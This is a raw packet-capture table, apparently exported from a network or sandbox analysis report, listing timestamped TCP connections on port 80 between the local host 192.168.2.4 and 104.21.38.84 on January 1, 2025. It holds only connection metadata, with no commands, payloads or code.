                                                                                                                  Jan 1, 2025 15:02:44.352900028 CET4978680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:44.568521023 CET8049786104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:44.618557930 CET4978680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:44.694891930 CET4978780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:44.699767113 CET8049787104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:44.700100899 CET4978780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:44.700172901 CET4978780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:44.704971075 CET8049787104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:45.056160927 CET4978780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:45.061157942 CET8049787104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:45.147562027 CET8049787104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:45.196791887 CET4978780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:45.397454977 CET8049787104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:45.446827888 CET4978780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:45.520356894 CET4978680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:45.527586937 CET4978780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:45.528223038 CET4978880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:45.532699108 CET8049787104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:45.532759905 CET4978780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:45.533070087 CET8049788104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:45.533139944 CET4978880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:45.533315897 CET4978880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:45.538146973 CET8049788104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:45.885040998 CET4978880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:45.889904022 CET8049788104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:45.978411913 CET8049788104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:46.024882078 CET4978880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:46.088196039 CET4978880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:46.088757992 CET4978980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:46.093417883 CET8049788104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:46.093496084 CET4978880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:46.093707085 CET8049789104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:46.093787909 CET4978980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:46.093919039 CET4978980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:46.098702908 CET8049789104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:46.210875988 CET4979080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:46.215748072 CET8049790104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:46.215827942 CET4979080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:46.215948105 CET4979080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:46.220767021 CET8049790104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:46.446762085 CET4978980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:46.451700926 CET8049789104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:46.451878071 CET8049789104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:46.557146072 CET8049789104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:46.571728945 CET4979080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:46.576615095 CET8049790104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:46.602914095 CET4978980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:46.699248075 CET8049790104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:46.743547916 CET4979080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:46.826323986 CET8049789104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:46.868516922 CET4978980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:46.870839119 CET8049790104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:46.915540934 CET4979080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:46.991450071 CET4978980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:46.991961956 CET4979080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:46.992342949 CET4979180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:46.997704983 CET8049789104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:46.997838020 CET4978980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:46.998107910 CET8049791104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:46.998173952 CET4979180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:46.998209000 CET8049790104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:46.998255014 CET4979080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:46.998256922 CET4979180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:47.005796909 CET8049791104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:47.353056908 CET4979180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:47.357992887 CET8049791104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:47.490968943 CET8049791104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:47.540397882 CET4979180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:47.753341913 CET8049791104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:47.806118011 CET4979180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:47.882159948 CET4976080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:47.882174969 CET4974580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:47.884035110 CET4975480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:47.884042978 CET4979280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:47.890098095 CET8049792104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:47.890208006 CET4979280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:47.890340090 CET4979280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:47.895188093 CET8049792104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:48.243859053 CET4979280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:48.248945951 CET8049792104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:48.335396051 CET8049792104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:48.384329081 CET4979280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:48.590187073 CET8049792104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:48.634404898 CET4979280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:48.736233950 CET4979280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:48.736547947 CET4979380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:48.741353035 CET8049792104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:48.741417885 CET8049793104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:48.741427898 CET4979280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:48.741487026 CET4979380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:48.741611958 CET4979380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:48.746428967 CET8049793104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:49.087496042 CET4979380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:49.092581987 CET8049793104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:49.256752968 CET8049793104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:49.306030035 CET4979380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:49.520925045 CET8049793104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:49.571650028 CET4979380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:49.656776905 CET4979380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:49.657196999 CET4979480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:49.662728071 CET8049793104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:49.662803888 CET4979380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:49.663151026 CET8049794104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:49.663234949 CET4979480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:49.663285017 CET4979480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:49.669225931 CET8049794104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:50.009284019 CET4979480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:50.014271975 CET8049794104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:50.135163069 CET8049794104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:50.181135893 CET4979480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:50.383744955 CET8049794104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:50.431061983 CET4979480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:50.509649992 CET4979480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:50.510241032 CET4979580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:50.514748096 CET8049794104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:50.514837980 CET4979480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:50.515136957 CET8049795104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:50.515207052 CET4979580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:50.515352011 CET4979580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:50.520175934 CET8049795104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:50.868848085 CET4979580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:50.873807907 CET8049795104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:50.959526062 CET8049795104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:51.009191990 CET4979580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:51.126379967 CET8049795104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:51.181057930 CET4979580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:51.240495920 CET4979580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:51.241231918 CET4979680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:51.245600939 CET8049795104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:51.245681047 CET4979580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:51.246064901 CET8049796104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:51.246148109 CET4979680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:51.246283054 CET4979680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:51.251086950 CET8049796104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:51.603097916 CET4979680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:51.608079910 CET8049796104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:51.717892885 CET8049796104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:51.759203911 CET4979680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:51.838886976 CET4979780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:51.839209080 CET4979680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:51.843950987 CET8049797104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:51.844047070 CET4979780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:51.844161987 CET4979780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:51.844252110 CET8049796104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:51.844306946 CET4979680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:51.848973989 CET8049797104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:51.991481066 CET4979880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:51.996406078 CET8049798104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:51.996516943 CET4979880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:51.996642113 CET4979880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:52.001418114 CET8049798104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:52.196845055 CET4979780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:52.201908112 CET8049797104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:52.202193022 CET8049797104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:52.316122055 CET8049797104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:52.353030920 CET4979880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:52.357979059 CET8049798104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:52.368575096 CET4979780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:52.466875076 CET8049798104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:52.509232998 CET4979880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:52.600591898 CET8049797104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:52.649780035 CET4979780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:52.727421045 CET8049798104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:52.774816990 CET4979880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:52.851059914 CET4979780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:52.851080894 CET4979880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:52.851831913 CET4979980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:52.856275082 CET8049797104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:52.856338978 CET4979780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:52.856611013 CET8049798104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:52.856708050 CET8049799104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:52.856734991 CET4979880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:52.856816053 CET4979980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:52.857002974 CET4979980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:52.861860037 CET8049799104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:53.212740898 CET4979980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:53.217684031 CET8049799104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:53.320554972 CET8049799104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:53.368624926 CET4979980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:53.590933084 CET8049799104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:53.634182930 CET4979980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:53.716291904 CET4980180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:53.721148014 CET8049801104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:53.721210003 CET4980180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:53.721311092 CET4980180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:53.726090908 CET8049801104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:54.071768999 CET4980180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:54.076667070 CET8049801104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:54.194719076 CET8049801104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:54.243549109 CET4980180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:54.458345890 CET8049801104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:54.509180069 CET4980180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:54.587065935 CET4980180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:54.587838888 CET4980280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:54.592061996 CET8049801104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:54.592138052 CET4980180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:54.592592001 CET8049802104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:54.592679977 CET4980280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:54.592762947 CET4980280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:54.597567081 CET8049802104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:54.946846962 CET4980280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:54.951906919 CET8049802104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:55.052489042 CET8049802104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:55.102938890 CET4980280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:55.313879967 CET8049802104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:55.368576050 CET4980280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:55.443798065 CET4980280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:55.444490910 CET4980480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:55.449923038 CET8049802104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:55.450526953 CET8049804104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:55.450604916 CET4980280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:55.450653076 CET4980480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:55.450772047 CET4980480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:55.455564976 CET8049804104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:55.806443930 CET4980480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:55.811398983 CET8049804104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:55.905267000 CET8049804104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:55.946762085 CET4980480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:56.171566010 CET8049804104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:56.215596914 CET4980480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:56.288783073 CET4980480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:56.289424896 CET4981080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:56.293813944 CET8049804104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:56.293909073 CET4980480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:56.294233084 CET8049810104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:56.294296026 CET4981080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:56.294423103 CET4981080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:56.299184084 CET8049810104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:56.649919987 CET4981080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:56.654714108 CET8049810104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:56.737859011 CET8049810104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:56.790452003 CET4981080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:56.912230015 CET8049810104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:56.962342024 CET4981080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:57.038079977 CET4981080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:57.038774014 CET4981580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:57.043076038 CET8049810104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:57.043133974 CET4981080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:57.043781996 CET8049815104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:57.043844938 CET4981580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:57.043950081 CET4981580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:57.048693895 CET8049815104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:57.404722929 CET4981580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:57.409866095 CET8049815104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:57.488173962 CET8049815104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:57.540548086 CET4981580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:57.603924990 CET4981580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:57.605209112 CET4981780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:57.608944893 CET8049815104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:57.609025002 CET4981580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:57.610088110 CET8049817104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:57.610148907 CET4981780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:57.610253096 CET4981780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:57.615066051 CET8049817104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:57.731378078 CET4981880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:57.736258030 CET8049818104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:57.736319065 CET4981880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:57.736423016 CET4981880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:57.741153002 CET8049818104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:57.962969065 CET4981780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:57.968010902 CET8049817104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:57.968039989 CET8049817104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:58.063896894 CET8049817104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:58.087512016 CET4981880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:58.092426062 CET8049818104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:58.118571043 CET4981780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:58.189572096 CET8049818104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:58.243653059 CET4981880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:58.340087891 CET8049817104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:58.384238005 CET4981780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:58.454675913 CET8049818104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:58.509186029 CET4981880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:58.585469007 CET4981780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:58.585639000 CET4981880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:58.586571932 CET4982680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:58.590689898 CET8049817104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:58.591042042 CET8049818104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:58.591099977 CET4981780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:58.591108084 CET4981880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:58.591350079 CET8049826104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:58.593055010 CET4982680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:58.593240023 CET4982680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:58.597953081 CET8049826104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:58.947052002 CET4982680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:58.951857090 CET8049826104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:59.051121950 CET8049826104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:59.102984905 CET4982680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:59.312905073 CET8049826104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:59.368566990 CET4982680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:59.451483965 CET4983480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:59.456295013 CET8049834104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:59.456365108 CET4983480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:59.456517935 CET4983480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:59.461271048 CET8049834104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:59.816833973 CET4983480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:59.821681023 CET8049834104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:59.985574007 CET8049834104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:03:00.040472031 CET4983480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:03:00.271431923 CET8049834104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:03:00.321712017 CET4983480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:03:00.405289888 CET4983480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:03:00.405987978 CET4984080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:03:00.410301924 CET8049834104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:03:00.410351992 CET4983480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:03:00.410846949 CET8049840104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:03:00.410914898 CET4984080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:03:00.411031961 CET4984080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:03:00.415832996 CET8049840104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:03:00.759402037 CET4984080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:03:00.764254093 CET8049840104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:03:00.865242004 CET8049840104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:03:00.915544033 CET4984080192.168.2.4104.21.38.84
